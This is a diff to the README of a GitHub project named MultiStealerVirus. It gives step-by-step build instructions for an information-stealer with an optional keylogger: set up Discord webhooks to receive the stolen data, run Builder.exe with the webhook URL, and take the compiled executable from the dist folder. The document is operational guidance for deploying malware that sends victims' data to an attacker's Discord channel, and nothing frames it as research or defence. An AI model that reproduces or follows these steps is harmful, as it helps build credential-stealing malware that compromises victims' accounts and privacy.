Josakko/MultiStealerVirus/README.md

 3. Create an discord server and in one of the channels (or two if you are going to use keylogger) create webhook by clicking on `Edit Channel` then `Integrations` next `Webhooks` and there click on button `New Webhook` and `Copy Webhook URL` to copy URL of the webhook.

-4. Now run `Builder.exe` and enter all info that you will be prompted witch also includes webhook URL, see first image below https://github.com/Josakko/MultiStealerVirus/tree/main#Examples
+4. Now run `Builder.exe` and enter all info that you will be prompted witch also includes webhook URL, see [this image](https://github.com/Josakko/MultiStealerVirus/tree/main#Examples)

+5. When compiling is complete you will have exe inside of `dist` folder relative to `Builder.exe`

 ## Examples